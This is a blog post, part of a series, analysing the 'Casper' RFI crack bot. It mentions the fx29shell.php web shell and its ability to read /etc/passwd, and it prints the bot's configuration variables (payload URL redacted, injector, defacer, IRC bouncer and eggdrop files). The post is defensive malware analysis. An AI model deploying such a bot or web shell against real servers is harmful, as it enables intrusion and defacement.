Irregular Expressions

Aug 22 2010   9:44PM GMT

Casper RFI crack bot – Part 5

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Some of the sh.txt script seems to be pretty old, calling milw0rm and darkc0de, both sites are no longer up and have not been for a while.

There is also a few things worth looking in to here, the script mentions fx29shell.php.  Which is a php shell that can be loaded onto the system.

I can do all kinds of nasty to your web server, you can download the /etc/passwd for a start. Not good if you find this on your system, might be a good time to do some google searches against your domain (while we are talking about it).

So after all of this it looks likes capser.(pl|txt) is the main thing doing all of the work. As you can tell with all of the variables.

$admin       = "XXXXX";
$serverircs  = array("");
$serverirc   = $serverircs[rand(0,count($serverircs) - 1)];
$urldata     = "http://xxxxxxx/xxxxxxx/casper/";
$injektor    = "sh.txt";
$defacer     = "def.txt";
$filepsy     = "psy.tar.gz";
$portpsy     = "6667";
$fileggdrop  = "eggdrop.tar.gz";
$filebotphp  = "bot.txt";
$crbots      = 2;
$filebotperl = "iso.txt";
$filebotscan = "scan.txt";

In the next section we will do a closer look at casper now that we poked around a bit.

 Comment on this Post

There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to:

Share this item with your network: